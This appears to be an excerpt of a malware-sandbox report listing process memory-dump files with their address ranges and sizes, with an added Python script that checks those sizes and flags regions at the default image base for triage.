                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2508-213-0x000001B9DB430000-0x000001B9DB4A1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2508-329-0x000001B9DBE00000-0x000001B9DBE71000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2524-330-0x000001DC1C410000-0x000001DC1C481000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    452KB

• memory/2524-219-0x000001DC1BE80000-0x000001DC1BEF1000-memory.dmp (Filesize: 452KB)
• memory/2688-207-0x000002A38BAA0000-0x000002A38BB11000-memory.dmp (Filesize: 452KB)
• memory/2688-311-0x000002A38BB70000-0x000002A38BBE1000-memory.dmp (Filesize: 452KB)
• memory/3168-184-0x00000000030C0000-0x000000000320A000-memory.dmp (Filesize: 1.3MB)
• memory/3168-181-0x0000000004C85000-0x0000000004D86000-memory.dmp (Filesize: 1.0MB)
• memory/3356-343-0x0000000000FB0000-0x0000000000FB1000-memory.dmp (Filesize: 4KB)
• memory/3356-348-0x00000000058D0000-0x00000000058D1000-memory.dmp (Filesize: 4KB)
• memory/3560-399-0x0000000005250000-0x0000000005856000-memory.dmp (Filesize: 6.0MB)
• memory/3560-377-0x0000000000400000-0x000000000041E000-memory.dmp (Filesize: 120KB)
• memory/3588-134-0x0000000000400000-0x000000000051D000-memory.dmp (Filesize: 1.1MB)
• memory/3588-133-0x000000006B280000-0x000000006B2A6000-memory.dmp (Filesize: 152KB)
• memory/3588-132-0x000000006FE40000-0x000000006FFC6000-memory.dmp (Filesize: 1.5MB)
• memory/3588-148-0x0000000064940000-0x0000000064959000-memory.dmp (Filesize: 100KB)
• memory/3588-149-0x0000000064940000-0x0000000064959000-memory.dmp (Filesize: 100KB)
• memory/3588-150-0x0000000064940000-0x0000000064959000-memory.dmp (Filesize: 100KB)
• memory/3588-151-0x0000000064940000-0x0000000064959000-memory.dmp (Filesize: 100KB)
• memory/3588-131-0x000000006B440000-0x000000006B4CF000-memory.dmp (Filesize: 572KB)
• memory/3676-209-0x0000025647B50000-0x0000025647BC1000-memory.dmp (Filesize: 452KB)
• memory/3772-390-0x0000000002750000-0x000000000276B000-memory.dmp (Filesize: 108KB)
• memory/3772-395-0x0000000004DD2000-0x0000000004DD3000-memory.dmp (Filesize: 4KB)

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3772-394-0x0000000004DE0000-0x0000000004DE1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3772-398-0x0000000004DA0000-0x0000000004DB9000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    100KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3772-418-0x0000000004DD4000-0x0000000004DD6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3772-392-0x00000000008F0000-0x000000000091F000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    188KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3772-402-0x0000000004DD0000-0x0000000004DD1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3772-404-0x0000000004DD3000-0x0000000004DD4000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3772-397-0x0000000000400000-0x00000000008A8000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/3968-430-0x00000000008F0000-0x0000000000A3A000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1.3MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4040-180-0x00000201FFBF0000-0x00000201FFC61000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4040-306-0x00000201FFB80000-0x00000201FFBCC000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    304KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4040-308-0x00000201FFE00000-0x00000201FFE71000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4040-186-0x00000201FFB30000-0x00000201FFB7C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    304KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4292-230-0x00000000003C0000-0x00000000003C1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4324-419-0x0000000076F70000-0x00000000770FE000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4496-429-0x0000000002FA0000-0x0000000003016000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    472KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4500-259-0x0000000004C20000-0x0000000004C21000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4500-272-0x0000000004E90000-0x0000000004E91000-memory.dmp

Filesize 4KB

• memory/4500-244-0x0000000000440000-0x0000000000441000-memory.dmp
  Filesize 4KB

• memory/4500-249-0x0000000004CA0000-0x0000000004CA1000-memory.dmp
  Filesize 4KB

• memory/4504-355-0x0000000004D60000-0x0000000004D61000-memory.dmp
  Filesize 4KB

• memory/4504-345-0x0000000000280000-0x0000000000281000-memory.dmp
  Filesize 4KB

• memory/4544-341-0x0000000000510000-0x0000000000511000-memory.dmp
  Filesize 4KB

• memory/4544-347-0x0000000004F10000-0x0000000004F11000-memory.dmp
  Filesize 4KB

• memory/4560-243-0x0000000000400000-0x00000000004E4000-memory.dmp
  Filesize 912KB

• memory/4628-316-0x00000000009C0000-0x0000000000B0A000-memory.dmp
  Filesize 1.3MB

• memory/4628-321-0x0000000000400000-0x00000000009BE000-memory.dmp
  Filesize 5.7MB

• memory/4804-374-0x0000000005200000-0x0000000005806000-memory.dmp
  Filesize 6.0MB

• memory/4804-365-0x0000000000400000-0x000000000041E000-memory.dmp
  Filesize 120KB

• memory/4808-271-0x000001FD2B060000-0x000001FD2B061000-memory.dmp
  Filesize 4KB

• memory/4880-303-0x00000000057C0000-0x0000000005DC6000-memory.dmp
  Filesize 6.0MB

• memory/4880-281-0x0000000000400000-0x000000000041E000-memory.dmp
  Filesize 120KB

• memory/4880-296-0x0000000003210000-0x0000000003211000-memory.dmp
  Filesize 4KB

• memory/4880-294-0x00000000031A0000-0x00000000031A1000-memory.dmp
  Filesize 4KB

• memory/4880-292-0x0000000005DD0000-0x0000000005DD1000-memory.dmp
  Filesize 4KB

• memory/4880-305-0x00000000057C0000-0x00000000057C1000-memory.dmp
  Filesize 4KB

• memory/4880-322-0x0000000005A30000-0x0000000005A31000-memory.dmp
  Filesize 4KB
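An added triage check over the dump list above (example code written for this page, not part of the sandbox report or its tooling): it parses the memory/<pid>-<n>-0x<start>-0x<end>-memory.dmp names, recomputes each region's length from the address range and compares it with the listed Filesize, marks regions whose address lies above 4 GB as belonging to a 64-bit process (4808, 5072), and lists the regions that start at the default 32-bit image base 0x400000 (4560, 4628, 4804, 4880), which are the dumps to carve first when looking for an unpacked PE. The sample lines are a constructed subset of the entries above; the image-base heuristic and the 0x10000 minimum length are assumptions of the example.

```python
import re

# Constructed sample: a subset of the memory-dump entries listed above,
# with the page's Filesize appended to each line.
SAMPLE = """\
memory/4500-244-0x0000000000440000-0x0000000000441000-memory.dmp 4KB
memory/4560-243-0x0000000000400000-0x00000000004E4000-memory.dmp 912KB
memory/4628-316-0x00000000009C0000-0x0000000000B0A000-memory.dmp 1.3MB
memory/4628-321-0x0000000000400000-0x00000000009BE000-memory.dmp 5.7MB
memory/4804-365-0x0000000000400000-0x000000000041E000-memory.dmp 120KB
memory/4880-281-0x0000000000400000-0x000000000041E000-memory.dmp 120KB
memory/5072-376-0x00000249C5050000-0x00000249C50BF000-memory.dmp 444KB
"""

ENTRY_RE = re.compile(
    r"memory/(?P<pid>\d+)-(?P<idx>\d+)-0x(?P<start>[0-9A-Fa-f]+)-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp"
    r"(?:\s+(?P<size>\d+(?:\.\d+)?)(?P<unit>[KM]B))?"
)

# Default image base of a 32-bit Windows EXE. Used here as a heuristic (an
# assumption of this example) to spot dumps that look like a whole unpacked
# image rather than a single heap or stack page.
DEFAULT_IMAGE_BASE = 0x400000


def human_size(nbytes):
    """Render a byte count the way the report does: whole KB below 1MB, one-decimal MB above."""
    if nbytes >= 1024 * 1024:
        return f"{nbytes / (1024 * 1024):.1f}MB"
    return f"{nbytes // 1024}KB"


def parse_entries(text):
    """Parse 'memory/<pid>-<n>-0x<start>-0x<end>-memory.dmp [<size>]' lines into dicts."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.search(line)
        if not m:
            continue
        start, end = int(m["start"], 16), int(m["end"], 16)
        entries.append({
            "pid": int(m["pid"]),
            "idx": int(m["idx"]),
            "start": start,
            "end": end,
            "length": end - start,
            "reported": (m["size"] + m["unit"]) if m["size"] else None,
            # A user-mode address above 4 GB can only belong to a 64-bit process.
            "x64": start > 0xFFFFFFFF,
        })
    return entries


def size_mismatches(entries):
    """Entries whose listed Filesize disagrees with the address range (a transcription error)."""
    return [e for e in entries
            if e["reported"] is not None and human_size(e["length"]) != e["reported"]]


def image_base_candidates(entries, min_length=0x10000):
    """Dumps starting at the default 32-bit image base and larger than a page:
    the first ones to check for an 'MZ' header at offset 0 when carving an unpacked PE."""
    return [e for e in entries
            if e["start"] == DEFAULT_IMAGE_BASE and e["length"] >= min_length]


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    for e in parsed:
        print(f"pid {e['pid']:>5} #{e['idx']:<4} {human_size(e['length']):>7}  x64={e['x64']}")
    print("size mismatches:", size_mismatches(parsed))
    for e in image_base_candidates(parsed):
        print(f"candidate unpacked image: pid {e['pid']} dump #{e['idx']} ({human_size(e['length'])})")
```

Run against the full list, `size_mismatches` should come back empty (every Filesize above matches its range), and the four 0x400000 regions are the ones worth opening in a PE parser before the 4KB single-page dumps.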

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5072-376-0x00000249C5050000-0x00000249C50BF000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    444KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5072-379-0x00000249C50C0000-0x00000249C5191000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    836KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5104-300-0x0000000004E5B000-0x0000000004F5C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5104-301-0x0000000004F60000-0x0000000004FBD000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    372KB